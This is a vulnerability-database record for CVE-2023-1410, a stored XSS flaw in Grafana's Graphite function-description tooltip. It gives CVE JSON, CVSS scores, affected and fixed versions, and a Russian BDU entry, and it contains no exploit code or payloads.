CVE-2023-1410 (GCVE-0-2023-1410)
Vulnerability from cvelistv5 – Published: 2023-03-23 07:48 – Updated: 2025-03-04 21:22
VLAI
Title
Stored XSS in Graphite FunctionDescription tooltip
Summary
Grafana is an open-source platform for monitoring and observability.
Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip.
The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.
An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.
Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.
Severity
6.2 (Medium)
CWE
Assigner
References
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Grafana | Grafana |
Affected:
8.0.0 , < 8.5.22
(semver)
Affected: 9.0.0 , < 9.2.15 (semver) Affected: 9.3.0 , < 9.3.11 (semver) |
|
| Grafana | Grafana Enterprise |
Affected:
8.0.0 , < 8.5.22
(semver)
Affected: 9.0.0 , < 9.2.15 (semver) Affected: 9.3.0 , < 9.3.11 (semver) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T05:49:11.621Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-1410/"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230420-0003/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-1410",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-04T21:21:42.873495Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-04T21:22:03.229Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Grafana",
"vendor": "Grafana",
"versions": [
{
"lessThan": "8.5.22",
"status": "affected",
"version": "8.0.0",
"versionType": "semver"
},
{
"lessThan": "9.2.15",
"status": "affected",
"version": "9.0.0",
"versionType": "semver"
},
{
"lessThan": "9.3.11",
"status": "affected",
"version": "9.3.0",
"versionType": "semver"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Grafana Enterprise",
"vendor": "Grafana",
"versions": [
{
"lessThan": "8.5.22",
"status": "affected",
"version": "8.0.0",
"versionType": "semver"
},
{
"lessThan": "9.2.15",
"status": "affected",
"version": "9.0.0",
"versionType": "semver"
},
{
"lessThan": "9.3.11",
"status": "affected",
"version": "9.3.0",
"versionType": "semver"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eGrafana is an open-source platform for monitoring and observability.\u0026nbsp;\u003c/p\u003e\u003cp\u003eGrafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. \u003c/p\u003e\u003cp\u003eThe stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.\u003c/p\u003e\u003cp\u003eAn attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.\u0026nbsp;\u003c/p\u003e\u003cp\u003e Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix. \u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cdiv\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cp\u003e\u003c/p\u003e"
}
],
"value": "Grafana is an open-source platform for monitoring and observability.\u00a0\n\nGrafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. \n\nThe stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.\n\nAn attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.\u00a0\n\n Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix."
}
],
"impacts": [
{
"capecId": "CAPEC-592",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-592"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-04-20T08:06:33.364Z",
"orgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da",
"shortName": "GRAFANA"
},
"references": [
{
"url": "https://grafana.com/security/security-advisories/cve-2023-1410/"
},
{
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230420-0003/"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Stored XSS in Graphite FunctionDescription tooltip",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da",
"assignerShortName": "GRAFANA",
"cveId": "CVE-2023-1410",
"datePublished": "2023-03-23T07:48:56.246Z",
"dateReserved": "2023-03-15T11:11:52.860Z",
"dateUpdated": "2025-03-04T21:22:03.229Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2023-1410",
"date": "2026-05-30",
"epss": "0.01991",
"percentile": "0.83915"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2023-1410\",\"sourceIdentifier\":\"security@grafana.com\",\"published\":\"2023-03-23T08:15:12.470\",\"lastModified\":\"2025-02-13T17:15:58.630\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Grafana is an open-source platform for monitoring and observability.\u00a0\\n\\nGrafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. \\n\\nThe stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.\\n\\nAn attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.\u00a0\\n\\n Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security@grafana.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N\",\"baseScore\":6.2,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.0,\"impactScore\":4.7},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":4.8,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.7,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security@grafana.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"8.0.0\",\"versionEndExcluding\":\"8.5.22\",\"matchCriteriaId\":\"F7482331-D381-4704-BF90-060DB1E279C1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"9.2.0\",\"versionEndExcluding\":\"9.2.15\",\"matchCriteriaId\":\"79D0AE4D-AD37-45A8-A84B-FE675F2D2943\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\",\"versionStartExcluding\":\"9.3.0\",\"versionEndExcluding\":\"9.3.11\",\"matchCriteriaId\":\"3D6B0083-7414-4C30-9C14-B4C4784F79DB\"}]}]}],\"references\":[{\"url\":\"https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76\",\"source\":\"security@grafana.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://grafana.com/security/security-advisories/cve-2023-1410/\",\"source\":\"security@grafana.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://security.netapp.com/advisory/ntap-20230420-0003/\",\"source\":\"security@grafana.com\"},{\"url\":\"https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://grafana.com/security/security-advisories/cve-2023-1410/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://security.netapp.com/advisory/ntap-20230420-0003/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://grafana.com/security/security-advisories/cve-2023-1410/\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://security.netapp.com/advisory/ntap-20230420-0003/\", \"tags\": [\"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T05:49:11.621Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-1410\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-03-04T21:21:42.873495Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-03-04T21:21:14.436Z\"}}], \"cna\": {\"title\": \"Stored XSS in Graphite FunctionDescription tooltip\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"impacts\": [{\"capecId\": \"CAPEC-592\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-592\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 6.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"HIGH\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"vendor\": \"Grafana\", \"product\": \"Grafana\", \"versions\": [{\"status\": \"affected\", \"version\": \"8.0.0\", \"lessThan\": \"8.5.22\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"9.0.0\", \"lessThan\": \"9.2.15\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"9.3.0\", \"lessThan\": \"9.3.11\", \"versionType\": \"semver\"}], \"defaultStatus\": \"unaffected\"}, {\"vendor\": \"Grafana\", \"product\": \"Grafana Enterprise\", \"versions\": [{\"status\": \"affected\", \"version\": \"8.0.0\", \"lessThan\": \"8.5.22\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"9.0.0\", \"lessThan\": \"9.2.15\", \"versionType\": \"semver\"}, {\"status\": \"affected\", \"version\": \"9.3.0\", \"lessThan\": \"9.3.11\", \"versionType\": \"semver\"}], \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://grafana.com/security/security-advisories/cve-2023-1410/\"}, {\"url\": \"https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76\"}, {\"url\": \"https://security.netapp.com/advisory/ntap-20230420-0003/\"}], \"x_generator\": {\"engine\": \"Vulnogram 0.1.0-dev\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Grafana is an open-source platform for monitoring and observability.\\u00a0\\n\\nGrafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. \\n\\nThe stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.\\n\\nAn attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.\\u00a0\\n\\n Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"\u003cp\u003eGrafana is an open-source platform for monitoring and observability.\u0026nbsp;\u003c/p\u003e\u003cp\u003eGrafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. \u003c/p\u003e\u003cp\u003eThe stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.\u003c/p\u003e\u003cp\u003eAn attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.\u0026nbsp;\u003c/p\u003e\u003cp\u003e Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix. \u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cdiv\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cp\u003e\u003c/p\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79\"}]}], \"providerMetadata\": {\"orgId\": \"57da9224-a3e2-4646-9d0e-c4dc2e05e7da\", \"shortName\": \"GRAFANA\", \"dateUpdated\": \"2023-04-20T08:06:33.364Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2023-1410\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-03-04T21:22:03.229Z\", \"dateReserved\": \"2023-03-15T11:11:52.860Z\", \"assignerOrgId\": \"57da9224-a3e2-4646-9d0e-c4dc2e05e7da\", \"datePublished\": \"2023-03-23T07:48:56.246Z\", \"assignerShortName\": \"GRAFANA\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
BDU:2024-02575
Vulnerability from fstec - Published: 23.03.2023
VLAI
Title
Уязвимость платформы для мониторинга и наблюдения Grafana, связанная с неправильной нейтрализацией ввода во время создания веб-страницы, позволяющая нарушителю позволяющая нарушителю осуществлять межсайтовые сценарные атаки (XSS)
Description
Уязвимость платформы для мониторинга и наблюдения Grafana связана с необходимостью выбрать подделанную функцию и навести указатель мыши на описание. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, осуществлять межсайтовые сценарные атаки (XSS)
Severity
Vendor
ООО «Ред Софт», Grafana Labs
Software Name
РЕД ОС (запись в едином реестре российских программ №3751), Grafana
Software Version
7.3 (РЕД ОС), от 8.0.0 до 8.5.22 (Grafana), от 9.2.0 до 9.2.15 (Grafana), от 9.3.0 до 9.3.11 (Grafana)
Possible Mitigations
Для grafana:
https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76
https://grafana.com/security/security-advisories/cve-2023-1410/
Для РедОС: http://repo.red-soft.ru/redos/7.3c/x86_64/updates/
Reference
https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76
https://grafana.com/security/security-advisories/cve-2023-1410/
https://redos.red-soft.ru/support/secure/
CWE
CWE-79
{
"CVSS 2.0": "AV:N/AC:L/Au:M/C:P/I:P/A:N",
"CVSS 3.0": "AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"CVSS 4.0": null,
"remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
"remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
"\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "\u041e\u041e\u041e \u00ab\u0420\u0435\u0434 \u0421\u043e\u0444\u0442\u00bb, Grafana Labs",
"\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "7.3 (\u0420\u0415\u0414 \u041e\u0421), \u043e\u0442 8.0.0 \u0434\u043e 8.5.22 (Grafana), \u043e\u0442 9.2.0 \u0434\u043e 9.2.15 (Grafana), \u043e\u0442 9.3.0 \u0434\u043e 9.3.11 (Grafana)",
"\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0414\u043b\u044f grafana:\nhttps://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76\nhttps://grafana.com/security/security-advisories/cve-2023-1410/\n\n\u0414\u043b\u044f \u0420\u0435\u0434\u041e\u0421: http://repo.red-soft.ru/redos/7.3c/x86_64/updates/",
"\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "23.03.2023",
"\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "04.04.2024",
"\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "04.04.2024",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2024-02575",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2023-1410",
"\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
"\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0434\u0430",
"\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "\u0420\u0415\u0414 \u041e\u0421 (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21163751), Grafana",
"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": "\u041e\u041e\u041e \u00ab\u0420\u0435\u0434 \u0421\u043e\u0444\u0442\u00bb \u0420\u0415\u0414 \u041e\u0421 7.3 (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21163751)",
"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b \u0434\u043b\u044f \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433\u0430 \u0438 \u043d\u0430\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u044f Grafana, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0439 \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0435\u0439 \u0432\u0432\u043e\u0434\u0430 \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0432\u0435\u0431-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0442\u044c \u043c\u0435\u0436\u0441\u0430\u0439\u0442\u043e\u0432\u044b\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 (XSS)",
"\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0421\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u041d\u0435\u043f\u0440\u0438\u043d\u044f\u0442\u0438\u0435 \u043c\u0435\u0440 \u043f\u043e \u0437\u0430\u0449\u0438\u0442\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0432\u0435\u0431-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b (\u0438\u043b\u0438 \\\u00ab\u041c\u0435\u0436\u0441\u0430\u0439\u0442\u043e\u0432\u0430\u044f \u0441\u0446\u0435\u043d\u0430\u0440\u043d\u0430\u044f \u0430\u0442\u0430\u043a\u0430\\\u00bb) (CWE-79)",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b \u0434\u043b\u044f \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433\u0430 \u0438 \u043d\u0430\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u044f Grafana \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0432\u044b\u0431\u0440\u0430\u0442\u044c \u043f\u043e\u0434\u0434\u0435\u043b\u0430\u043d\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u0438 \u043d\u0430\u0432\u0435\u0441\u0442\u0438 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043c\u044b\u0448\u0438 \u043d\u0430 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0442\u044c \u043c\u0435\u0436\u0441\u0430\u0439\u0442\u043e\u0432\u044b\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 (XSS)",
"\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
"\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": null,
"\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
"\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u0418\u043d\u044a\u0435\u043a\u0446\u0438\u044f",
"\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76\nhttps://grafana.com/security/security-advisories/cve-2023-1410/\nhttps://redos.red-soft.ru/support/secure/",
"\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
"\u0422\u0438\u043f \u041f\u041e": "\u041e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430, \u041f\u0440\u0438\u043a\u043b\u0430\u0434\u043d\u043e\u0435 \u041f\u041e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c",
"\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-79",
